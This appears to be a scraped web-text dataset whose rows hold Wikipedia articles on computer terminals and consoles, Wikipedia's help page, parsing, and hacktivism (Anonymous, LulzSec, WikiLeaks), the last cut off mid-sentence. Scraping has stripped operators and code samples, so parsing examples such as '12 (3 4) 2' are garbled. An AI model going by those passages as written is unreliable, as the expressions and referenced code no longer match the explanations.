codes from function keys, what character attributes were available, block-sending of fields within forms, "foreign" character facilities, and handling of printers connected to the back of the screen. In the 21st century, the term Intelligent Terminal can now refer to a retail Point of Sale computer. 29 While early IBM PCs had single-color green screens, these screens were not terminals. The screen of a PC did not contain any character generation hardware; all video signals and video formatting were generated by the video display card in the PC, or (in most graphics modes) by the CPU and software. An IBM PC monitor, whether it was the green monochrome display or the 16 color display, was technically much more similar to an analog TV set (without a tuner) than to a terminal. With suitable software a PC could, however, emulate a terminal, and in that capacity it could be connected to a mainframe or minicomputer. The Data General One could be booted into terminal emulator mode from its ROM. Eventually microprocessor-based personal computers greatly reduced the market demand for conventional terminals. In the 1990s especially, "thin clients" and X terminals have combined economical local processing power with central, shared computer facilities to retain some of the advantages of terminals over personal computers: Today, most PC telnet clients provide emulation of the most common terminal, citation needed the DEC VT100, using the ANSI escape code standard X3.64, or could run as X terminals using software such as Cygwin X under Microsoft Windows or X.Org Server software under Linux. Since the advent and subsequent popularization of the personal computer, few genuine hardware terminals are used to interface with computers today. Using the monitor and keyboard, modern operating systems like Linux and the BSD derivatives feature virtual consoles, which are mostly independent from the hardware used. When using a graphical user interface (or GUI) like the X Window System, one's display is typically occupied by a collection of windows associated with various applications, rather than a single stream of text associated with a single process. In this case, one may use a terminal emulator application within the windowing environment. This arrangement permits terminal-like interaction with the computer (for running a command-line interpreter, for example) without the need for a physical terminal device; it can even run multiple terminal emulators on the same device. Several categories of terminals described above have been used as hardware and software consoles, with some variation in the nomenclature. These may be keyboard printer terminals, keyboard display terminals, or special applications running on a smaller computer. They frequently attach via a proprietary interface, and supplement or replace the functions of a front panel. They are sometimes referred to as control consoles or system consoles. These may be keyboard printer terminals, keyboard display terminals or applications. On some systems, e.g., OS 360, they have a specialized role with its own command language, unrelated to the command language for user sessions on normal terminals. On, e.g., Unix-like systems, the software is controlled by users with elevated privileges and a system console is just an ordinary terminal with a privileged user logged on. It is common for, e.g., Unix-like systems, to include applications with names like command, console, terminal, to serve as consoles for the logged on user. One meaning of system console, computer console, root console, operator's console, or simply console is the text entry and display device for system administration messages, particularly those from the BIOS or boot loader, the kernel, from the init system and from the system logger. It is a physical device consisting of a keyboard and a printer or screen, and traditionally is a text terminal, but may also be a graphical terminal. System consoles are generalized to computer terminals, which are abstracted respectively by virtual consoles and terminal emulators. Today communication with system consoles is generally done abstractly, via the standard streams (stdin, stdout, and stderr), but there may be system-specific interfaces, for example those used by the system kernel. 30 better source needed Another, older, meaning of system console, computer console, hardware console, operator's console or simply console is a hardware component used by an operator to control the hardware, typically some combination of front panel, keyboard printer and keyboard display. Prior to the development of alphanumeric CRT system consoles, some computers such as the IBM 1620 had console typewriters and front panels while the very first electronic stored-program computer, the Manchester Baby, used a combination of electromechanical switches and a CRT to provide console functions—the CRT displaying memory contents in binary by mirroring the machine's Williams-Kilburn tube CRT-based RAM. Some early operating systems supported either a single keyboard print or keyboard display device for controlling the OS. Some also supported a single alternate console, and some supported a hardcopy console for retaining a record of commands, responses and other console messages. However, in the late 1960s it became common for operating systems to support many more consoles than 3, and operating systems began appearing in which the console was simply any terminal with a privileged user logged on. On early minicomputers, the console was a serial console, an RS 232 serial link to a terminal such as a ASR 33 or, later, a terminal from Digital Equipment Corporation (DEC), e.g., DECWriter, VT100. This terminal was usually kept in a secured room since it could be used for certain privileged functions such as halting the system or selecting which media to boot from. Large midrange systems, e.g. those from Sun Microsystems, Hewlett-Packard and IBM, citation needed still use serial consoles. In larger installations, the console ports are attached to multiplexers or network-connected multiport serial servers that let an operator connect a terminal to any of the attached servers. Today, serial consoles are often used for accessing headless systems, usually with a terminal emulator running on a laptop. Also, routers, enterprise network switches and other telecommunication equipment have RS 232 serial console ports. On PCs and workstations, the computer's attached keyboard and monitor have the equivalent function. Since the monitor cable carries video signals, it cannot be extended very far. Often, installations with many servers therefore use keyboard video multiplexers (KVM switches) and possibly video amplifiers to centralize console access. In recent years, KVM IP devices have become available that allow a remote computer to view the video output and send keyboard input via any TCP IP network and therefore the Internet. Some PC BIOSes, especially in servers, also support serial consoles, giving access to the BIOS through a serial port so that the simpler and cheaper serial console infrastructure can be used. Even where BIOS support is lacking, some operating systems, e.g. FreeBSD and Linux, can be configured for serial console operation either during bootup, or after startup. Starting with the IBM 9672, IBM large systems have used a Hardware Management Console (HMC), consisting of a PC and a specialized application, instead of a 3270 or serial link. Other IBM product lines also use an HMC, e.g., System p. It is usually possible to log in from the console. Depending on configuration, the operating system may treat a login session from the console as being more trustworthy than a login session from other sources. A terminal emulator is a piece of software that emulates a text terminal. In the past, before the widespread use of local area networks and broadband internet access, many computers would use a serial access program to communicate with other computers via telephone line or serial device. When the first Macintosh was released, a program called MacTerminal 31 was used to communicate with many computers, including the IBM PC. The Win32 console on Windows does not emulate a physical terminal that supports escape sequences 32 dubious discuss so SSH and Telnet programs (for logging in textually to remote computers) for Windows, including the Telnet program bundled with some versions of Windows, often incorporate their own code to process escape sequences. The terminal emulators on most Unix-like systems—such as, for example, gnome-terminal, Konsole, QTerminal, xterm, and Terminal.app—do emulate physical terminals including support for escape sequences; e.g., xterm can emulate the VT220 and Tektronix 4010 hardware terminals. Terminals can operate in various modes, relating to when they send input typed by the user on the keyboard to the receiving system (whatever that may be): There is a distinction between the return and the Enter keys. In some multiple-mode terminals, that can switch between modes, pressing the Enter key when not in block mode does not do the same thing as pressing the return key. Whilst the return key will cause an input line to be sent to the host in line-at-a-time mode, the Enter key will rather cause the terminal to transmit the contents of the character row where the cursor is currently positioned to the host, host-issued prompts and all. 35 Some block-mode terminals have both an Enter and local cursor moving keys such as Return and New Line. Different computer operating systems require different degrees of mode support when terminals are used as computer terminals. The POSIX terminal interface, as provided by Unix and POSIX-compliant operating systems, does not accommodate block-mode terminals at all, and only rarely requires the terminal itself to be in line-at-a-time mode, since the operating system is required to provide canonical input mode, where the terminal device driver in the operating system emulates local echo in the terminal, and performs line editing functions at the host end. Most usually, and especially so that the host system can support non-canonical input mode, terminals for POSIX-compliant systems are always in character-at-a-time mode. In contrast, IBM 3270 terminals connected to MVS systems are always required to be in block mode. 37 38 39 40 |
462 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Contents | This page provides help with the most common questions about Wikipedia. You can also search Wikipedia's help pages using the search box below, or browse the Help menu or the Help directory. The Readers' FAQ and our about page contain the most commonly sought information about Wikipedia. For simple searches, there is a search box at the top of every page. Type what you are looking for in the box. Partial matches will appear in a dropdown list. Select any page in the list to go to that page. Or, select the magnifying glass "Go" button, or press Enter, to go to a full search result. For advanced searches, see Help:Searching. There are other ways to browse and explore Wikipedia articles; many can be found at Wikipedia:Contents. See our disclaimer for cautions about Wikipedia's limitations. For mobile access, press the mobile view link at the very bottom of every desktop view page. Contributing is easy: see how to edit a page. For a quick summary on participating, see contributing to Wikipedia, and for a friendly tutorial, see our introduction. For a listing of introductions and tutorials by topic, see getting started. The Simplified Manual of Style and Cheatsheet can remind you of basic wiki markup. Be bold in improving articles When adding facts, please provide references so others may verify them. If you are affiliated with the article subject, please see our conflict of interest guideline. The simple guide to vandalism cleanup can help you undo malicious edits. If you're looking for places you can help out, the Task Center is the place to go, or check out what else is happening at the community portal. You can practice editing and experiment in a sandboxyour sandbox. If there is a problem with an article about yourself, a family member, a friend or a colleague, please read Biographies of living persons Help. If you spot a problem with an article, you can fix it directly, by clicking on the "Edit" link at the top of that page. See the "edit an article" section of this page for more information. If you don't feel ready to fix the article yourself, post a message on the article's talk page. This will bring the matter to the attention of others who work on that article. There is a "Talk" link at the beginning of every article page. You can contact us. If it's an article about you or your organization, see Contact us Subjects. Check Your first article to see if your topic is appropriate, then the Article wizard will walk you through creating the article. Once you have created an article, see Writing better articles for guidance on how to improve it and what to include (like reference citations). For contributing images, audio or video files, see the Introduction to uploading images. Then the Upload wizard will guide you through that process. Answers to common problems can be found at frequently asked questions. Or check out where to ask questions or make comments. New users should seek help at the Teahouse if they're having problems while editing Wikipedia. More complex questions can be posed at the Help desk. Volunteers will respond as soon as they're able. Or ask for help on your talk page and a volunteer will visit you there You can get live help with editing in the help chatroom. For help with technical issues, ask at the Village pump. If searching Wikipedia has not answered your question (for example, questions like "Which country has the world's largest fishing fleet? ), try the Reference Desk. Volunteers there will attempt to answer your questions on any topic, or point you toward the information you need. There are two ways to create subcategories. Search Frequently Asked Questions Search the help desk archives |
463 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Parsing | Parsing, syntax analysis, or syntactic analysis is the process of analyzing a string of symbols, either in natural language, computer languages or data structures, conforming to the rules of a formal grammar. The term parsing comes from Latin pars (orationis), meaning part (of speech). 1 The term has slightly different meanings in different branches of linguistics and computer science. Traditional sentence parsing is often performed as a method of understanding the exact meaning of a sentence or word, sometimes with the aid of devices such as sentence diagrams. It usually emphasizes the importance of grammatical divisions such as subject and predicate. Within computational linguistics the term is used to refer to the formal analysis by a computer of a sentence or other string of words into its constituents, resulting in a parse tree showing their syntactic relation to each other, which may also contain semantic information. citation needed Some parsing algorithms generate a parse forest or list of parse trees from a string that is syntactically ambiguous. 2 The term is also used in psycholinguistics when describing language comprehension. In this context, parsing refers to the way that human beings analyze a sentence or phrase (in spoken language or text) "in terms of grammatical constituents, identifying the parts of speech, syntactic relations, etc. 1 This term is especially common when discussing which linguistic cues help speakers interpret garden-path sentences. Within computer science, the term is used in the analysis of computer languages, referring to the syntactic analysis of the input code into its component parts in order to facilitate the writing of compilers and interpreters. The term may also be used to describe a split or separation. The traditional grammatical exercise of parsing, sometimes known as clause analysis, involves breaking down a text into its component parts of speech with an explanation of the form, function, and syntactic relationship of each part. 3 This is determined in large part from study of the language's conjugations and declensions, which can be quite intricate for heavily inflected languages. To parse a phrase such as "man bites dog" involves noting that the singular noun "man" is the subject of the sentence, the verb "bites" is the third person singular of the present tense of the verb "to bite", and the singular noun "dog" is the object of the sentence. Techniques such as sentence diagrams are sometimes used to indicate relation between elements in the sentence. Parsing was formerly central to the teaching of grammar throughout the English-speaking world, and widely regarded as basic to the use and understanding of written language. However, the general teaching of such techniques is no longer current. citation needed In some machine translation and natural language processing systems, written texts in human languages are parsed by computer programs. 4 Human sentences are not easily parsed by programs, as there is substantial ambiguity in the structure of human language, whose usage is to convey meaning (or semantics) amongst a potentially unlimited range of possibilities, but only some of which are germane to the particular case. 5 So an utterance "Man bites dog" versus "Dog bites man" is definite on one detail but in another language might appear as "Man dog bites" with a reliance on the larger context to distinguish between those two possibilities, if indeed that difference was of concern. It is difficult to prepare formal rules to describe informal behaviour even though it is clear that some rules are being followed. citation needed In order to parse natural language data, researchers must first agree on the grammar to be used. The choice of syntax is affected by both linguistic and computational concerns; for instance some parsing systems use lexical functional grammar, but in general, parsing for grammars of this type is known to be NP-complete. Head-driven phrase structure grammar is another linguistic formalism which has been popular in the parsing community, but other research efforts have focused on less complex formalisms such as the one used in the Penn Treebank. Shallow parsing aims to find only the boundaries of major constituents such as noun phrases. Another popular strategy for avoiding linguistic controversy is dependency grammar parsing. Most modern parsers are at least partly statistical; that is, they rely on a corpus of training data which has already been annotated (parsed by hand). This approach allows the system to gather information about the frequency with which various constructions occur in specific contexts. (See machine learning.) Approaches which have been used include straightforward PCFGs (probabilistic context-free grammars), 6 maximum entropy, 7 and neural nets. 8 Most of the more successful systems use lexical statistics (that is, they consider the identities of the words involved, as well as their part of speech). However such systems are vulnerable to overfitting and require some kind of smoothing to be effective. citation needed Parsing algorithms for natural language cannot rely on the grammar having 'nice' properties as with manually designed grammars for programming languages. As mentioned earlier some grammar formalisms are very difficult to parse computationally; in general, even if the desired structure is not context-free, some kind of context-free approximation to the grammar is used to perform a first pass. Algorithms which use context-free grammars often rely on some variant of the CYK algorithm, usually with some heuristic to prune away unlikely analyses to save time. (See chart parsing.) However some systems trade speed for accuracy using, e.g., linear-time versions of the shift-reduce algorithm. A somewhat recent development has been parse reranking in which the parser proposes some large number of analyses, and a more complex system selects the best option. citation needed In natural language understanding applications, semantic parsers convert the text into a representation of its meaning. 9 In psycholinguistics, parsing involves not just the assignment of words to categories (formation of ontological insights), but the evaluation of the meaning of a sentence according to the rules of syntax drawn by inferences made from each word in the sentence (known as connotation). This normally occurs as words are being heard or read. Neurolinguistics generally understands parsing to be a function of working memory, meaning that parsing is used to keep several parts of one sentence at play in the mind at one time, all readily accessible to be analyzed as needed. Because the human working memory has limitations, so does the function of sentence parsing. 10 This is evidenced by several different types of syntactically complex sentences that propose potentially issues for mental parsing of sentences. The first, and perhaps most well-known, type of sentence that challenges parsing ability is the garden-path sentence. These sentences are designed so that the most common interpretation of the sentence appears grammatically faulty, but upon further inspection, these sentences are grammatically sound. Garden-path sentences are difficult to parse because they contain a phrase or a word with more than one meaning, often their most typical meaning being a different part of speech. 11 For example, in the sentence, "the horse raced past the barn fell", raced is initially interpreted as a past tense verb, but in this sentence, it functions as part of an adjective phrase. 12 Since parsing is used to identify parts of speech, these sentences challenge the parsing ability of the reader. Another type of sentence that is difficult to parse is an attachment ambiguity, which includes a phrase that could potentially modify different parts of a sentence, and therefore presents a challenge in identifying syntactic relationship (i.e. "The boy saw the lady with the telescope", in which the ambiguous phrase with the telescope could modify the boy saw or the lady.) 11 A third type of sentence that challenges parsing ability is center embedding, in which phrases are placed in the center of other similarly formed phrases (i.e. "The rat the cat the man hit chased ran into the trap".) Sentences with 2 or in the most extreme cases 3 center embeddings are challenging for mental parsing, again because of ambiguity of syntactic relationship. 13 Within neurolinguistics there are multiple theories that aim to describe how parsing takes place in the brain. One such model is a more traditional generative model of sentence processing, which theorizes that within the brain there is a distinct module designed for sentence parsing, which is preceded by access to lexical recognition and retrieval, and then followed by syntactic processing that considers a single syntactic result of the parsing, only returning to revise that syntactic interpretation if a potential problem is detected. 14 The opposing, more contemporary model theorizes that within the mind, the processing of a sentence is not modular, or happening in strict sequence. Rather, it poses that several different syntactic possibilities can be considered at the same time, because lexical access, syntactic processing, and determination of meaning occur in parallel in the brain. In this way these processes are integrated. 15 Although there is still much to learn about the neurology of parsing, studies have shown evidence that several areas of the brain might play a role in parsing. These include the left anterior temporal pole, the left inferior frontal gyrus, the left superior temporal gyrus, the left superior frontal gyrus, the right posterior cingulate cortex, and the left angular gyrus. Although it has not been absolutely proven, it has been suggested that these different structures might favor either phrase-structure parsing or dependency-structure parsing, meaning different types of parsing could be processed in different ways which have yet to be understood. 16 Discourse analysis examines ways to analyze language use and semiotic events. Persuasive language may be called rhetoric. A parser is a software component that takes input data (typically text) and builds a data structure often some kind of parse tree, abstract syntax tree or other hierarchical structure, giving a structural representation of the input while checking for correct syntax. The parsing may be preceded or followed by other steps, or these may be combined into a single step. The parser is often preceded by a separate lexical analyser, which creates tokens from the sequence of input characters; alternatively, these can be combined in scannerless parsing. Parsers may be programmed by hand or may be automatically or semi-automatically generated by a parser generator. Parsing is complementary to templating, which produces formatted output. These may be applied to different domains, but often appear together, such as the scanf printf pair, or the input (front end parsing) and output (back end code generation) stages of a compiler. The input to a parser is typically text in some computer language, but may also be text in a natural language or less structured textual data, in which case generally only certain parts of the text are extracted, rather than a parse tree being constructed. Parsers range from very simple functions such as scanf, to complex programs such as the frontend of a C compiler or the HTML parser of a web browser. An important class of simple parsing is done using regular expressions, in which a group of regular expressions defines a regular language and a regular expression engine automatically generating a parser for that language, allowing pattern matching and extraction of text. In other contexts regular expressions are instead used prior to parsing, as the lexing step whose output is then used by the parser. The use of parsers varies by input. In the case of data languages, a parser is often found as the file reading facility of a program, such as reading in HTML or XML text; these examples are markup languages. In the case of programming languages, a parser is a component of a compiler or interpreter, which parses the source code of a computer programming language to create some form of internal representation; the parser is a key step in the compiler frontend. Programming languages tend to be specified in terms of a deterministic context-free grammar because fast and efficient parsers can be written for them. For compilers, the parsing itself can be done in one pass or multiple passes see one-pass compiler and multi-pass compiler. The implied disadvantages of a one-pass compiler can largely be overcome by adding fix-ups, where provision is made for code relocation during the forward pass, and the fix-ups are applied backwards when the current program segment has been recognized as having been completed. An example where such a fix-up mechanism would be useful would be a forward GOTO statement, where the target of the GOTO is unknown until the program segment is completed. In this case, the application of the fix-up would be delayed until the target of the GOTO was recognized. Conversely, a backward GOTO does not require a fix-up, as the location will already be known. Context-free grammars are limited in the extent to which they can express all of the requirements of a language. Informally, the reason is that the memory of such a language is limited. The grammar cannot remember the presence of a construct over an arbitrarily long input; this is necessary for a language in which, for example, a name must be declared before it may be referenced. More powerful grammars that can express this constraint, however, cannot be parsed efficiently. Thus, it is a common strategy to create a relaxed parser for a context-free grammar which accepts a superset of the desired language constructs (that is, it accepts some invalid constructs); later, the unwanted constructs can be filtered out at the semantic analysis (contextual analysis) step. For example, in Python the following is syntactically valid code: The following code, however, is syntactically valid in terms of the context-free grammar, yielding a syntax tree with the same structure as the previous, but violates the semantic rule requiring variables to be initialized before use: The following example demonstrates the common case of parsing a computer language with two levels of grammar: lexical and syntactic. The first stage is the token generation, or lexical analysis, by which the input character stream is split into meaningful symbols defined by a grammar of regular expressions. For example, a calculator program would look at an input such as "12 (3 4) 2" and split it into the tokens 12, , (, 3, , 4, ), , 2, each of which is a meaningful symbol in the context of an arithmetic expression. The lexer would contain rules to tell it that the characters , , , ( and ) mark the start of a new token, so meaningless tokens like "12 or (3" will not be generated. The next stage is parsing or syntactic analysis, which is checking that the tokens form an allowable expression. This is usually done with reference to a context-free grammar which recursively defines components that can make up an expression and the order in which they must appear. However, not all rules defining programming languages can be expressed by context-free grammars alone, for example type validity and proper declaration of identifiers. These rules can be formally expressed with attribute grammars. The final phase is semantic parsing or analysis, which is working out the implications of the expression just validated and taking the appropriate action. 17 In the case of a calculator or interpreter, the action is to evaluate the expression or program; a compiler, on the other hand, would generate some kind of code. Attribute grammars can also be used to define these actions. The task of the parser is essentially to determine if and how the input can be derived from the start symbol of the grammar. This can be done in essentially two ways: LL parsers and recursive-descent parser are examples of top-down parsers that cannot accommodate left recursive production rules. Although it has been believed that simple implementations of top-down parsing cannot accommodate direct and indirect left-recursion and may require exponential time and space complexity while parsing ambiguous context-free grammars, more sophisticated algorithms for top-down parsing have been created by Frost, Hafiz, and Callaghan 20 21 which accommodate ambiguity and left recursion in polynomial time and which generate polynomial-size representations of the potentially exponential number of parse trees. Their algorithm is able to produce both left-most and right-most derivations of an input with regard to a given context-free grammar. An important distinction with regard to parsers is whether a parser generates a leftmost derivation or a rightmost derivation (see context-free grammar). LL parsers will generate a leftmost derivation and LR parsers will generate a rightmost derivation (although usually in reverse). 18 Some graphical parsing algorithms have been designed for visual programming languages. 22 23 Parsers for visual languages are sometimes based on graph grammars. 24 Adaptive parsing algorithms have been used to construct "self-extending" natural language user interfaces. 25 A simple parser implementation reads the entire input file, performs an intermediate computation or translation, and then writes the entire output file, such as in-memory multi-pass compilers. Alternative parser implementation approaches: Some of the well known parser development tools include the following: Lookahead establishes the maximum incoming tokens that a parser can use to decide which rule it should use. Lookahead is especially relevant to LL, LR, and LALR parsers, where it is often explicitly indicated by affixing the lookahead to the algorithm name in parentheses, such as LALR(1). Most programming languages, the primary target of parsers, are carefully defined in such a way that a parser with limited lookahead, typically one, can parse them, because parsers with limited lookahead are often more efficient. One important change citation needed to this trend came in 1990 when Terence Parr created ANTLR for his Ph.D. thesis, a parser generator for efficient LL(k) parsers, where k is any fixed value. LR parsers typically have only a few actions after seeing each token. They are shift (add this token to the stack for later reduction), reduce (pop tokens from the stack and form a syntactic construct), end, error (no known rule applies) or conflict (does not know whether to shift or reduce). Lookahead has two advantages. clarification needed Example: Parsing the Expression 1 2 3 dubious discuss Most programming languages (except for a few such as APL and Smalltalk) and algebraic formulas give higher precedence to multiplication than addition, in which case the correct interpretation of the example above is 1 (2 3). Note that Rule4 above is a semantic rule. It is possible to rewrite the grammar to incorporate this into the syntax. However, not all such rules can be translated into syntax. Initially Input 1, , 2, , 3 The parse tree and resulting code from it is not correct according to language semantics. To correctly parse without lookahead, there are three solutions: The parse tree generated is correct and simply more efficient clarify citation needed than non-lookahead parsers. This is the strategy followed in LALR parsers. |
464 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Hacktivism | Internet activism, hacktivism, or hactivism (a portmanteau of hack and activism), is the use of computer-based techniques such as hacking as a form of civil disobedience to promote a political agenda or social change. 1 With roots in hacker culture and hacker ethics, its ends are often related to free speech, human rights, or freedom of information movements. 2 Hacktivist activities span many political ideals and issues. Freenet, a peer-to-peer platform for censorship-resistant communication, is a prime example of translating political thought and freedom of speech into code. Hacking as a form of activism can be carried out by a singular activist or through a network of activists, such as Anonymous and WikiLeaks, working in collaboration toward common goals without an overarching authority figure. 3 4 "Hacktivism" is a controversial term with several meanings. The word was coined to characterize electronic direct action as working toward social change by combining programming skills with critical thinking. But just as hack can sometimes mean cyber crime, hacktivism can be used to mean activism that is malicious, destructive, and undermining the security of the Internet as a technical, economic, and political platform. 5 In comparison to previous forms of social activism, hacktivism has had unprecedented success, bringing in more participants, using more tools, and having more influence in that it has the ability to alter elections, begin conflicts, and take down businesses. 6 According to the United States 2020 2022 Counterintelligence Strategy, in addition to state adversaries and transnational criminal organizations, "ideologically motivated entities such as hacktivists, leaktivists, and public disclosure organizations, also pose significant threats". 7 8 Writer Jason Sack first used the term hacktivism in a 1995 article in conceptualizing New Media artist Shu Lea Cheang's film Fresh Kill. 9 10 However, the term is frequently attributed to the Cult of the Dead Cow (cDc) member "Omega, who used it in a 1996 e-mail to the group. 11 12 Due to the variety of meanings of its root words, the definition of hacktivism is nebulous and there exists significant disagreement over the kinds of activities and purposes it encompasses. Some definitions include acts of cyberterrorism while others simply reaffirm the use of technological hacking to effect social change. 13 14 Self-proclaimed "hacktivists" often work anonymously, sometimes operating in groups while other times operating as a lone wolf with several cyber-personas all corresponding to one activist 15 within the cyberactivism umbrella that has been gaining public interest and power in pop-culture. Hacktivists generally operate under apolitical ideals and express uninhibited ideas or abuse without being scrutinized by society while representing or defending themselves publicly under an anonymous identity giving them a sense of power in the cyberactivism community citation needed . In order to carry out their operations, hacktivists might create new tools; or integrate or use a variety of software tools readily available on the Internet. One class of hacktivist activities includes increasing the accessibility of others to take politically motivated action online citation needed . Repertoire of contention of hacktivism includes among others: Depending on who is using the term, hacktivism can be a politically motivated technology hack, a constructive form of anarchic civil disobedience, or an undefined anti-systemic gesture. 28 It can signal anticapitalist or political protest; it can denote anti-spam activists, security experts, or open source advocates. 29 Some people who? describing themselves as hacktivists have taken to defacing websites for political reasons, such as attacking and defacing websites of governments and those who oppose their ideology. 30 Others, such as Oxblood Ruffin (the "foreign affairs minister" of Cult of the Dead Cow and Hacktivismo), have argued forcefully against definitions of hacktivism that include web defacements or denial-of-service attacks. 31 Hacktivism is often seen as shadowy due to its anonymity, commonly attributed to the work of fringe groups and outlying members of society. 15 The lack of responsible parties to be held accountable for the social-media attacks performed by hactivists has created implications in corporate and federal security measures both on and offline. 22 While some self-described hacktivists who? have engaged in DoS attacks, critics suggest who? that DoS attacks are an attack on free speech and that they have unintended consequences. DoS attacks waste resources and they can lead to a "DoS war" that nobody will win citation needed . In 2006, Blue Security attempted to automate a DoS attack against spammers; this led to a massive DoS attack against Blue Security which knocked them, their old ISP and their DNS provider off the Internet, destroying their business. 32 Following denial-of-service attacks by Anonymous on multiple sites, in reprisal for the apparent suppression of WikiLeaks, John Perry Barlow, a founding member of the EFF, said "I support freedom of expression, no matter whose, so I oppose DDoS attacks regardless of their target... they're the poison gas of cyberspace... . 33 On the other hand, Jay Leiderman, an attorney for many hacktivists, argues that DDoS can be a legitimate form of protest speech in situations that are reasonably limited in time, place and manner. 34 WikiLeaks is a media organisation and publisher founded in 2006. It operates as a non-profit and is funded by donations 79 and media partnerships. It has published classified documents and other media provided by anonymous sources. 80 It was founded by Julian Assange, an Australian editor, publisher, and activist, who is currently challenging extradition to the United States over his work with WikiLeaks. 81 Since September 2018, Kristinn Hrafnsson has served as its editor-in-chief. 82 83 Its website states that it has released more than ten million documents and associated analyses. 84 WikiLeaks' most recent publication was in 2021, and its most recent publication of original documents was in 2019. 85 Beginning in November 2022, many of the documents on the organisation's website could not be accessed. 85 86 87 88 WikiLeaks has released document caches and media that exposed serious violations of human rights and civil liberties by various governments. It released footage, which it titled Collateral Murder, of the 12 July 2007 Baghdad airstrike, in which Iraqi Reuters journalists and several civilians were killed by a U.S. helicopter crew. 89 WikiLeaks has also published leaks such as diplomatic cables from the United States and Saudi Arabia, 90 91 emails from the governments of Syria 92 93 and Turkey, 94 95 96 corruption in Kenya 97 98 and at Samherji. 99 WikiLeaks has also published documents exposing cyber warfare and surveillance tools created by the CIA, 100 101 and surveillance of the French president by the National Security Agency. 102 103 During the 2016 U.S. presidential election campaign, WikiLeaks released emails from the Democratic National Committee (DNC) and from Hillary Clinton's campaign manager, showing that the party's national committee had effectively acted as an arm of the Clinton campaign during the primaries, seeking to undercut the campaign of Bernie Sanders. These releases resulted in the resignation of the chairwoman of the DNC and caused significant harm to the Clinton campaign. 104 During the campaign, WikiLeaks promoted false conspiracy theories about Hillary Clinton, the Democratic Party and the murder of Seth Rich. 105 106 107 WikiLeaks has won a number of awards and has been commended for exposing state and corporate secrets, increasing transparency, assisting freedom of the press, and enhancing democratic discourse while challenging powerful institutions. WikiLeaks and some of its supporters say the organisation's publications have a perfect record of publishing authentic documents. The organisation has been the target of campaigns to discredit it, including aborted ones by Palantir and HBGary. WikiLeaks has also had its donation systems disrupted by problems with its payment processors. As a result, the Wau Holland Foundation helps process WikiLeaks' donations. The organisation has been criticised for inadequately curating some of its content and violating the personal privacy of individuals. WikiLeaks has, for instance, revealed Social Security numbers, medical information, credit card numbers and details of suicide attempts. 108 109 110 News organisations, activists, journalists and former members have also criticised the organisation over allegations of anti-Clinton and pro-Trump bias, various associations with the Russian government, buying and selling of leaks, and a lack of internal transparency. Journalists have also criticised the organisation for promotion of false flag conspiracy theories, and what they describe as exaggerated and misleading descriptions of the contents of leaks. The CIA defined the organisation as a "non-state hostile intelligence service" after the release of Vault 7. 111 Perhaps the most prolific and well known hacktivist group, Anonymous has been prominent and prevalent in many major online hacks over the past decade. Anonymous is a decentralized group that originated on the forums of 4chan during 2003, but didn't rise to prominence until 2008 when they directly attacked the Church of Scientology in a massive DoS attack. 112 Since then, Anonymous has participated in a great number of online projects such as Operation: Payback and Operation: Safe Winter. 113 114 However, while a great number of their projects have been for a charitable cause, 113 they have still gained notoriety from the media due to the nature of their work mostly consisting of illegal hacking. 115 Following the Paris terror attacks in 2015, Anonymous posted a video declaring war on ISIS, 116 the terror group that claimed responsibility for the attacks. Since declaring war on ISIS, Anonymous since identified several Twitter accounts associated with the movement in order to stop the distribution of ISIS propaganda. However, Anonymous fell under heavy criticism when Twitter issued a statement calling the lists Anonymous had compiled "wildly inaccurate, as it contained accounts of journalists and academics rather than members of ISIS. 117 Anonymous has also been involved with the Black Lives Matter movement. Early in July 2015, there was a rumor circulating that Anonymous was calling for a Day of Rage protests in retaliation for the shootings of Alton Sterling and Philando Castile, which would entail violent protests and riots. This rumor was based on a video that was not posted with the official Anonymous YouTube account. citation needed None of the Twitter accounts associated with Anonymous had tweeted anything in relation to a Day of Rage, and the rumors were identical to past rumors that had circulated in 2014 following the death of Mike Brown. 118 Instead, on July 15, a Twitter account associated with Anonymous posted a series of tweets calling for a day of solidarity with the Black Lives Matter movement. The Twitter account used the hashtag FridayofSolidarity" to coordinate protests across the nation, and emphasized the fact that the Friday of Solidarity was intended for peaceful protests. The account also stated that the group was unaware of any Day of Rage plans. 119 In February 2017 the group took down more than 10,000 sites on the Dark web related to child porn. 2 DkD , a French cyberhacktivist, was arrested by the OCLCTIC (office central de lutte contre la criminalit li e aux technologies de l’information et de la communication), in March 2003. DkD defaced more than 2000 pages, many were governments and US military sites. Eric Voulleminot of the Regional Service of Judicial Police in Lille classified the young hacker as "the most wanted hacktivist in France" 120 DkD was a very known defacer in the underground for his political view, doing his defacements for various political reasons. In response to his arrest, The Ghost Boys defaced many navy.mil sites using the “Free DkD slogan. 121 122 In May 2011, five members of Anonymous formed the hacktivist group Lulz Security, otherwise known as LulzSec. LulzSec's name originated from the conjunction of the internet slang term "lulz", meaning laughs, and "sec", meaning security. 47 The group members used specific handles to identify themselves on Internet Relay Channels, the most notable being: "Sabu, "Kayla, "T-Flow, "Topiary, "AVUnit, and "Pwnsauce. Though the members of LulzSec would spend up to 20 hours a day in communication, they did not know one another personally, nor did they share personal information. For example, once the members' identities were revealed, "T-Flow" was revealed to be 15 years old. Other members, on the basis of his advanced coding ability, thought he was around 30 years old. 123 One of the first notable targets that LulzSec pursued was HBGary, which was performed in response to a claim made by the technology security company that it had identified members of Anonymous. Following this, the members of LulzSec targeted an array of companies and entities, including but not limited to: Fox Television, Tribune Company, PBS, Sony, Nintendo, and the Senate.gov website. The targeting of these entities typically involved gaining access to and downloading confidential user information, or defacing the website at hand. 124 LulzSec while not as strongly political as those typical of WikiLeaks or Anonymous, they shared similar sentiments for the freedom of information. One of their distinctly politically driven attacks involved targeting the Arizona State Police in response to new immigration laws. 125 The group's first attack that garnered significant government attention was in 2011, when they collectively took down a website of the FBI. Following the incident, the leader of LulzSec, "Sabu, was identified as Hector Xavier Monsegur by the FBI, and he was the first of the group to be arrested. Immediately following his arrest, Monsegur admitted to criminal activity. He then began his cooperation with the US government, helping FBI authorities to arrest 8 of his co-conspirators, prevent 300 potential cyber attacks, and helped to identify vulnerabilities in existing computer systems. In August 2011, Monsegur pleaded guilty to "computer hacking conspiracy, computer hacking, computer hacking in furtherance of fraud, conspiracy to commit access device fraud, conspiracy to commit bank fraud, and aggravated identity theft pursuant to a cooperation agreement with the government. He served a total of one year and seven months and was charged a $1,200 fine. 126 SiegedSec, short for Sieged Security and commonly self-referred to as the "Gay Furry Hackers", 127 128 is a black-hat criminal hacktivist group that was formed in early 